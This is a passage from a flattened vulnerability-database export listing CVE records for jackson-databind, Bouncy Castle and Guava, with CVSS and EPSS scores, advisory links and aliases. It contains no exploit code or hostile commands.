reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:netapp:7-mode_transition_tool:-:*:*:*:*:*:*:*
reference_id cpe:2.3:a:netapp:7-mode_transition_tool:-:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:netapp:7-mode_transition_tool:-:*:*:*:*:*:*:*
18
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite:6.4:-:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:satellite:6.4:-:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite:6.4:-:*:*:*:*:*:*
19
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite_capsule:6.4:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:satellite_capsule:6.4:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite_capsule:6.4:*:*:*:*:*:*:*
20
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:*:*:*:*
reference_id cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:*:*:*:*
21
reference_url https://nvd.nist.gov/vuln/detail/CVE-2016-1000338
reference_id CVE-2016-1000338
reference_type
scores
0
value 5.0
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:N/C:N/I:P/A:N
1
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2016-1000338
22
reference_url https://github.com/advisories/GHSA-4vhj-98r6-424h
reference_id GHSA-4vhj-98r6-424h
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4vhj-98r6-424h
23
reference_url https://usn.ubuntu.com/3727-1/
reference_id USN-3727-1
reference_type
scores
url https://usn.ubuntu.com/3727-1/
fixed_packages
aliases CVE-2016-1000338, GHSA-4vhj-98r6-424h
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jua2-2byr-t3cv
44
url VCID-jvp6-892x-nkc7
vulnerability_id VCID-jvp6-892x-nkc7
summary 
jackson-databind mishandles the interaction between serialization gadgets and typing
FasterXML jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core).
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-9548.json
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-9548.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-9548
reference_id
reference_type
scores
0
value 0.57602
scoring_system epss
scoring_elements 0.98166
published_at 2026-04-13T12:55:00Z
1
value 0.57602
scoring_system epss
scoring_elements 0.98162
published_at 2026-04-09T12:55:00Z
2
value 0.57602
scoring_system epss
scoring_elements 0.98158
published_at 2026-04-07T12:55:00Z
3
value 0.57602
scoring_system epss
scoring_elements 0.98156
published_at 2026-04-04T12:55:00Z
4
value 0.57602
scoring_system epss
scoring_elements 0.98152
published_at 2026-04-02T12:55:00Z
5
value 0.57602
scoring_system epss
scoring_elements 0.9815
published_at 2026-04-01T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-9548
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9548
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9548
3
reference_url https://github.com/FasterXML/jackson-databind
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind
4
reference_url https://github.com/FasterXML/jackson-databind/commit/1e64db6a2fad331f96c7363fda3bc5f3dffa25bb
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/1e64db6a2fad331f96c7363fda3bc5f3dffa25bb
5
reference_url https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2
6
reference_url https://github.com/FasterXML/jackson-databind/issues/2634
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/issues/2634
7
reference_url https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E
8
reference_url https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E
9
reference_url https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E
10
reference_url https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E
11
reference_url https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E
12
reference_url https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E
13
reference_url https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E
14
reference_url https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E
15
reference_url https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html
16
reference_url https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
17
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-9548
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-9548
18
reference_url https://security.netapp.com/advisory/ntap-20200904-0006
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20200904-0006
19
reference_url https://www.oracle.com/security-alerts/cpujan2021.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujan2021.html
20
reference_url https://www.oracle.com/security-alerts/cpujul2020.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujul2020.html
21
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2020.html
22
reference_url https://www.oracle.com/security-alerts/cpuoct2021.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2021.html
23
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1816340
reference_id 1816340
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1816340
24
reference_url https://github.com/advisories/GHSA-p43x-xfjf-5jhr
reference_id GHSA-p43x-xfjf-5jhr
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-p43x-xfjf-5jhr
25
reference_url https://access.redhat.com/errata/RHSA-2020:1644
reference_id RHSA-2020:1644
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:1644
26
reference_url https://access.redhat.com/errata/RHSA-2020:2067
reference_id RHSA-2020:2067
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2067
27
reference_url https://access.redhat.com/errata/RHSA-2020:2511
reference_id RHSA-2020:2511
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2511
28
reference_url https://access.redhat.com/errata/RHSA-2020:2512
reference_id RHSA-2020:2512
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2512
29
reference_url https://access.redhat.com/errata/RHSA-2020:2513
reference_id RHSA-2020:2513
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2513
30
reference_url https://access.redhat.com/errata/RHSA-2020:2515
reference_id RHSA-2020:2515
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2515
31
reference_url https://access.redhat.com/errata/RHSA-2020:2813
reference_id RHSA-2020:2813
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2813
32
reference_url https://access.redhat.com/errata/RHSA-2020:3192
reference_id RHSA-2020:3192
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3192
33
reference_url https://access.redhat.com/errata/RHSA-2020:3196
reference_id RHSA-2020:3196
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3196
34
reference_url https://access.redhat.com/errata/RHSA-2020:3197
reference_id RHSA-2020:3197
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3197
35
reference_url https://access.redhat.com/errata/RHSA-2020:3779
reference_id RHSA-2020:3779
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3779
36
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
37
reference_url https://access.redhat.com/errata/RHSA-2025:1746
reference_id RHSA-2025:1746
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:1746
38
reference_url https://usn.ubuntu.com/USN-4813-1/
reference_id USN-USN-4813-1
reference_type
scores
url https://usn.ubuntu.com/USN-4813-1/
fixed_packages
aliases CVE-2020-9548, GHSA-p43x-xfjf-5jhr
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jvp6-892x-nkc7
45
url VCID-ka8b-44hx-mkc5
vulnerability_id VCID-ka8b-44hx-mkc5
summary In the Bouncy Castle JCE Provider version 1.55 and earlier the ECIES implementation allowed the use of ECB mode. This mode is regarded as unsafe and support for it has been removed from the provider.
references
0
reference_url https://access.redhat.com/errata/RHSA-2018:2669
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2669
1
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2927
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-1000352.json
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-1000352.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2016-1000352
reference_id
reference_type
scores
0
value 0.00388
scoring_system epss
scoring_elements 0.59926
published_at 2026-04-09T12:55:00Z
1
value 0.00388
scoring_system epss
scoring_elements 0.59913
published_at 2026-04-13T12:55:00Z
2
value 0.00388
scoring_system epss
scoring_elements 0.59932
published_at 2026-04-12T12:55:00Z
3
value 0.00388
scoring_system epss
scoring_elements 0.59947
published_at 2026-04-11T12:55:00Z
4
value 0.00388
scoring_system epss
scoring_elements 0.5979
published_at 2026-04-01T12:55:00Z
5
value 0.00388
scoring_system epss
scoring_elements 0.59867
published_at 2026-04-02T12:55:00Z
6
value 0.00388
scoring_system epss
scoring_elements 0.59892
published_at 2026-04-04T12:55:00Z
7
value 0.00388
scoring_system epss
scoring_elements 0.59862
published_at 2026-04-07T12:55:00Z
8
value 0.00388
scoring_system epss
scoring_elements 0.59912
published_at 2026-04-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2016-1000352
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000352
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000352
5
reference_url https://github.com/bcgit/bc-java
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/bcgit/bc-java
6
reference_url https://github.com/bcgit/bc-java/commit/9385b0ebd277724b167fe1d1456e3c112112be1f
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/bcgit/bc-java/commit/9385b0ebd277724b167fe1d1456e3c112112be1f
7
reference_url https://security.netapp.com/advisory/ntap-20181127-0004
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20181127-0004
8
reference_url https://security.netapp.com/advisory/ntap-20181127-0004/
reference_id
reference_type
scores
url https://security.netapp.com/advisory/ntap-20181127-0004/
9
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2020.html
10
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1588330
reference_id 1588330
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1588330
11
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
12
reference_url https://nvd.nist.gov/vuln/detail/CVE-2016-1000352
reference_id CVE-2016-1000352
reference_type
scores
0
value 5.8
scoring_system cvssv2
scoring_elements AV:N/AC:M/Au:N/C:P/I:P/A:N
1
value 7.4
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
2
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
3
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2016-1000352
13
reference_url https://github.com/advisories/GHSA-w285-wf9q-5w69
reference_id GHSA-w285-wf9q-5w69
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-w285-wf9q-5w69
fixed_packages
aliases CVE-2016-1000352, GHSA-w285-wf9q-5w69
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ka8b-44hx-mkc5
46
url VCID-kwyu-yq4w-kqe4
vulnerability_id VCID-kwyu-yq4w-kqe4
summary Unbounded memory allocation in Google Guava 11.0 through 24.x before 24.1.1 allows remote attackers to conduct denial of service attacks against servers that depend on this library and deserialize attacker-provided data, because the AtomicDoubleArray class (when serialized with Java serialization) and the CompoundOrdering class (when serialized with GWT serialization) perform eager allocation without appropriate checks on what a client has sent and whether the data size is reasonable.
references
0
reference_url https://access.redhat.com/errata/RHSA-2018:2423
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2423
1
reference_url https://access.redhat.com/errata/RHSA-2018:2424
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2424
2
reference_url https://access.redhat.com/errata/RHSA-2018:2425
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2425
3
reference_url https://access.redhat.com/errata/RHSA-2018:2428
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2428
4
reference_url https://access.redhat.com/errata/RHSA-2018:2598
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2598
5
reference_url https://access.redhat.com/errata/RHSA-2018:2643
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2643
6
reference_url https://access.redhat.com/errata/RHSA-2018:2740
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2740
7
reference_url https://access.redhat.com/errata/RHSA-2018:2741
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2741
8
reference_url https://access.redhat.com/errata/RHSA-2018:2742
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2742
9
reference_url https://access.redhat.com/errata/RHSA-2018:2743
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2743
10
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2927
11
reference_url https://access.redhat.com/errata/RHSA-2019:2858
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:2858
12
reference_url https://access.redhat.com/errata/RHSA-2019:3149
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:3149
13
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-10237.json
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-10237.json
14
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-10237
reference_id
reference_type
scores
0
value 0.03259
scoring_system epss
scoring_elements 0.87137
published_at 2026-04-13T12:55:00Z
1
value 0.03259
scoring_system epss
scoring_elements 0.87085
published_at 2026-04-01T12:55:00Z
2
value 0.03259
scoring_system epss
scoring_elements 0.87096
published_at 2026-04-02T12:55:00Z
3
value 0.03259
scoring_system epss
scoring_elements 0.87114
published_at 2026-04-04T12:55:00Z
4
value 0.03259
scoring_system epss
scoring_elements 0.87106
published_at 2026-04-07T12:55:00Z
5
value 0.03259
scoring_system epss
scoring_elements 0.87127
published_at 2026-04-08T12:55:00Z
6
value 0.03259
scoring_system epss
scoring_elements 0.87134
published_at 2026-04-09T12:55:00Z
7
value 0.03259
scoring_system epss
scoring_elements 0.87148
published_at 2026-04-11T12:55:00Z
8
value 0.03259
scoring_system epss
scoring_elements 0.87142
published_at 2026-04-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-10237
15
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10237
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10237
16
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
17
reference_url https://github.com/google/guava
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/google/guava
18
reference_url https://github.com/google/guava/commit/f89ece5721b2f637fe754937ff1f3c86d80bb196
reference_id
reference_type
scores
url https://github.com/google/guava/commit/f89ece5721b2f637fe754937ff1f3c86d80bb196
19
reference_url https://groups.google.com/d/topic/guava-announce/xqWALw4W1vs/discussion
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://groups.google.com/d/topic/guava-announce/xqWALw4W1vs/discussion
20
reference_url https://groups.google.com/forum/#!topic/guava-announce/xqWALw4W1vs/discussion
reference_id
reference_type
scores
url https://groups.google.com/forum/#!topic/guava-announce/xqWALw4W1vs/discussion
21
reference_url https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
